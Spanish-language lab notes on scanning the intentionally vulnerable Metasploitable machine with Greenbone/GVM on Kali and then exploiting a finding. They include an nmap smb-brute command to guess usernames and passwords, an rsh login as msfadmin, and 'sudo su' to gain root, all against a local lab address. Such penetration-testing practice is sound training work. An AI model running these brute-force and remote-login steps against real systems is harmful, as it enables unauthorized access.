Escanear host gvm
Parte 1: Escanear un host en busca de vulnerabilidades
Iniciar servicios GVM:
bashCopy codesudo gvm-start
Acceder a Greenbone Security Assistant:
Navegar a https://127.0.0.1:9392
Iniciar sesión con:
Usuario:
admin
Contraseña:
kali
Escaneo del host Metasploitable:
Navegar a Escaneos -> Tareas -> Asistente de tareas avanzadas.
Ingresar detalles y crear tarea para escanear Metasploitable.
Ver informes y resultados:
Esperar hasta que la tarea esté completa.
Acceder al informe y la pestaña Resultados.
Interpretar resultados del escaneo:
Hacer clic en la vulnerabilidad "El servicio rexec se está ejecutando" en la pestaña Resultados.
Parte 2: Explotar una vulnerabilidad encontrada por GVM
Descubrir nombres de usuario y contraseñas con Nmap:
sudo nmap -sV -p 445 -script smb-brute 172.17.0.2
Instalar cliente de shell remoto (RSH):
sudo apt-get install rsh-client
Iniciar sesión en Metasploitable usando RSH:
rsh -l msfadmin 172.17.0.2
Obtener acceso raíz:
sudo su
Última actualización